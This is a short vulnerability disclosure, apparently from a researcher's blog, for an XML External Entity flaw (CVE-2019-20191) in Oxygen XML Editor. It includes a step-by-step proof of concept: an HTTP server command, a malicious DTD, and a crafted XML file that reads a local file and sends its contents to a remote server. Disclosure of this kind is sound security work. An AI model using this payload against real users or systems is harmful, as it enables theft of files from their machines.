Oxygen XML Editor is the best XML editor available and provides a comprehensive suite of XML authoring and development tools. It is designed to accommodate a large number of users, ranging from beginners to XML experts. It is available on multiple platforms, all major operating systems, and as a standalone application or an Eclipse plug-in. You can use Oxygen XML Editor in conjunction with all XML-based technologies and it includes a large variety of powerful tools for creating, editing, and publishing XML documents.
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. In this case this attack allow arbitrary file read in the system.
👨🏼💻Discovered by Pablo Santiago.
📝Published 13/01/2020.
💉CVE-2019–20191
📄Vulnerable version ≤ 21.1.1
Risk
A malicious user could generate a malicious XML to try reading files in the system.Proof Of Concept
1- Start HTTP web server
python -m SimpleHTTPServer 80002.- Create and upload the next payload to your server, and save it like test.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;3.- Create a malicious XML file
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\FILE">
<!ENTITY % dtd SYSTEM "http://localhost:8000/test.dtd">
%dtd;]>
<pwn>&send;</pwn>4.- Open the malicious xml file with the software and see the response in your server.
